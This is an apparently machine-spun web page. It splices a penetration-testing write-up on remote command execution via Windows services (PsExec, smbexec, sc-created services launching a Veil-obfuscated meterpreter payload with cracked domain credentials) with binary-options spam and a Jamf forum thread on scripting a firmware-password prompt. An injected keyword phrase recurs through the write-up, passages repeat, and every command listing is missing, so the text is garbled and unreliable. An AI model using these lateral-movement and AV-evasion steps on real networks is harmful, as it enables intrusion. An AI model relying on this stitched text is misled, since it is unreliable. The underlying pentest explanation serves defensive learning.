shell_exec

5 stars based on 34 reviews

In Part 1I listed some common tools and techniques to use domain credentials to execute commands on Windows machines from Kali linux. In this post, I'm going to delve a little bit into how those tools actually work by re-creating the techniques from a Windows machine. All of the tools mentioned in the previous post psexec, binary from command line run as administrator with password, etc are essentially re-implementations of core Windows functionality, and every technique can be used natively from within Windows.

A lot of pentesters myself included have used the psexec techniques extensively, but until recently I never fully understood what was going on under the hood.

Hopefully this post binary from command line run as administrator with password shed some light on PsExec by manually re-creating the technique using native Windows tools.

It is not domain joined, it just sits on the same network. And as a reminder, we have recovered or cracked a single domain user's account:. There's a few ways you can test credentials against a machine from Windows, but for demonstration purposes I'm binary from command line run as administrator with password use the basic net commands.

This isn't the best or stealthiest way to do it, but it's easy to follow and understand. An easy way to test credentials is to try to initiate an SMB connection to the machine. This is essentially what Metasploit's module does. In Windows, you can utilize the net use command with credentials to establish an SMB connection with a host:. We can see it completes successfully, so the credentials are good. If we weren't an admin, we'd see an access denied: Now one of the problems with this technique is we have established connections with the Windows hosts that can be detected.

If an administrator on ordws01 ran a net session command, he or she would see a connection open from our attacking box:. The other problem is that we can't use all the net commands and other Windows tools by passing a username and password.

But we can bypass that limitation. The Windows runas command let's us binary from command line run as administrator with password commands in the context of another user. We can launch an interactive command prompt by running "cmd. The beauty of this technique is that our LogonId changes, and we can actually start using Kerberos auth on the domain. Note how the whoami output is the same but our LogonId changes in the new command prompt after doing a runas: In this new command prompt, we don't need to run the net use command to open connections with specified credentials.

We can just use normal commands the Windows will use our LogonId with Kerberos authentication:. From this command prompt we are essentially "on the domain" and can start running native Windows commands with the privileges of jarrieta.

In the last post, I used Metasploit's "psexec" module and Impacket's "psexec. Both of these tools are based on a classic Windows utility named, shockingly, psexec. PsExec is a light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software.

It's a standalone binary that's included in the Sysinternals suite. You can pass credentials to it and remotely execute commands or drop into an interactive command prompt:. If you run it from the "runas" command prompt which has a Kerberos TGT, you don't even need to specify credentials. This might clue you in a little bit as to how PsExec actually operates.

In fact, if we go on the target machine and view services while the command prompt is open, we can see it:. The service starts the binary C: So PsExec performs a few steps to get you a shell:. This is precisely how the Metasploit module and the Impacket script operate as well. We can also manually recreate the steps to remotely start any other binary of our choice e.

First let's assume we have a payload executable we generated with msfvenom and obfuscated with Veil so AV doesn't flag it. Really though, it could be copied and hidden anywhere on the filesystem. The Windows sc command is used to query, create, delete, etc Windows services and can be used remotely. Read more about it here. From our command prompt, we'll remotely create a service called "meterpreter" that points to our uploaded binary:. The last step is to start the service and execute the binary.

That's because our meterpreter binary isn't an actual service binary and won't return binary from command line run as administrator with password expected response code.

That's fine because we just need it to execute once to fire:. After getting the meterpreter session, I'd migrate out of the met Why the sudden privilege escalation? It has to do with how services are created and started. If we really wanted to run the service with different credentials, we could have specified when we created it, but if we can just jump to straight to SYSTEM why would we want to?

One of the Impacket tools I used last past to get a semi-interactive shell is "smbexec. This makes use of a really clever technique to execute commands and binary from command line run as administrator with password output through SMB without needing to drop a binary on the system. Let's see what happens when smbexec runs by looking at it from the target's side. Obviously we could look at the source code, but this is more fun.

As a reminder, let's see what smbexec looks like when it's fired up:. But that service isn't present on the target machine when we do an sc query. The system logs reveal a clue to what happened:. It echos the command to be executed to a bat file, redirects the stdout and stderr to a Temp file, then executes the bat file and deletes it.

Back on Kali, the Python script then pulls the output file via SMB and displays the contents in our "pseudo-shell". For every command we type into our "shell", a new service is created and the process is repeated. This is why it doesn't need to drop a binary, it just executes each desired command as a new service.

Definitely more stealthy, but as we saw, an event log is created for every command executed. Still a very clever way to get a non-interactive "shell"!

As smbexec demonstrated, it's possible to execute commands directly from service binPaths instead of needing a binary. This can be a useful trick to keep in your back pocket if you need to just execute one arbitrary command on a target Windows machine. As a quick example, let's get a Meterpreter shell using a remote service without a binary.

The listener is set up and it tells us the command to execute on the target machine:. From our Windows attack box, we create a remote service "metpsh" and set the binPath to execute cmd. It errors out because our service doesn't respond, but if we look at our Metasploit listener we see that the callback was made and binary from command line run as administrator with password payload executed:.

And we just launched a meterpreter payload remotely through a Windows service without dropping a binary. Which, by the way, is nothing revolutionary. This is exactly how Metasploit tries to execute payloads through the psexec module now. Only if PowerShell is not available or you manually specify it will Metasploit actually drop a binary on the target systems now which is good, since most AV detects Metasploit binaries now.

In this post I walked through how Windows services can be used to remotely execute commands when you have credentials.

Hopefully this exposed some of the "magic" behind Metasploit's psexec module and Impacket's psexec and smbexec scripts. If you're ever on a pentest and don't have access to Kali, now you know how to use native Windows tools to replicate some of the behavior.

Hope this helped someone. Writing it and exploring these tools certainly helped me. Feel free to comment with questions or tell me where I'm wrong. And as a reminder, we have recovered or cracked a single domain user's account: In Windows, you can utilize the net use command with credentials to establish an SMB connection with a host: We can see which connections we have open by issuing a net use command: If an administrator on ordws01 ran a net session command, he or she would see a connection open from our attacking box: Using 'runas' to get Kerberos auth The Windows runas command let's us execute commands in the context of another user.

We can just use normal commands the Windows will use our LogonId with Kerberos authentication: From the TechNet article: PsExec is a light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console binary from command line run as administrator with password, without having to manually install client software It's a standalone binary that's included in the Sysinternals suite.

You can pass credentials to it and remotely execute commands or drop into an interactive command prompt: When you start PsExec, you may notice a status line saying: In fact, if we go on the target machine and view services while the command prompt is open, we can see it: So PsExec performs a few steps to get you a shell: Manually PsExec'ing First let's assume we have a payload executable we generated with msfvenom and obfuscated with Veil so AV doesn't flag it.

From our command prompt, we'll remotely create a service called "meterpreter" that points to our uploaded binary: That's fine because we just need it to execute once to fire: If we look at our Metasploit listener, we'll see the session has been opened: As a reminder, let's see what smbexec looks like when it's fired up: The system logs reveal a clue to what happened: Executing commands via services As smbexec demonstrated, it's possible to execute commands directly from service binPaths instead of needing a binary.

The listener is set up and it tells us the command to execute on the target machine: And then start it:

16 thoughts on do you or have you ever traded binary options

  • Publicita trading che fanno in tv avkastning binara optioner unbegrenztes demokonto binare optionen

    We trade options

  • Anfanger broker binare optionen fur

    Why follow a 60 seconds binary options strategy 2016

Opciones binarias socota 0x400000

  • Day trading options at expiration torrent

    Brokerage fee calculator

  • Forex software descargar gratis

    Rating of the best binary options brokers 2014

  • 4 options binary trading platform australian

    Day trading for beginners uk

Broker ausbildung schweiz

11 comments Islamic binary options brokers list zvezda geeks

Popularity of binary options brokers

I want to write a script to disable the EFI password. I could use the jamf binary, I know, but I want the script to work even on machines without the jamf binary. I wanted to ask, how can I perform a command and send the needed password in this case, the firmwarepassword with the command, so there would be no prompt in the Terminal? With the last line I tried to give the efi-password to the "firmwarepasswd -verify" command, but as it not worked out, I think this is completely wrong..

And the "-verify" is only now for testing, I know the correct option would be "-delete". Hi, thanks for your answer. This looks interesting, but it's based on the JSS. I want to write a solution that works completely without the JSS or the jamf binary.

I was thinking of using the "expect" and "send" commands, but I'm not capable of using them correctly.. Sorry - I read your post too quickly and expected an FAQ. Yes, if that command line tool doesn't support sending the password via command line parameter, then you'll need the expect command.

Assuming it prompts for password. I don't know what the output of that command looks like. Unfortunately it still won't work. It asks for the admin password, it asks for the EFI password, but it is not able to "enter" this EFI password automatically without asking the user in the terminal for it.. Dialog with your fellow IT professionals, gain insight about Apple device deployments, share best practices and bounce ideas off each other.

Learn more about Jamf. How to send a command with needed password in a shell script? Hope someone can help: This is the current state of the script: And the "-verify" is only now for testing, I know the correct option would be "-delete" Thanks for any input! Most Likes Oldest Newest. It's not simple, but it does work. I'm still working on this Log in to post a response.

Spam This is an advertisement—it is not useful or relevant. Inappropriate This is offensive or in violation of our Community Etiquette. This has been flagged. This could not be flagged.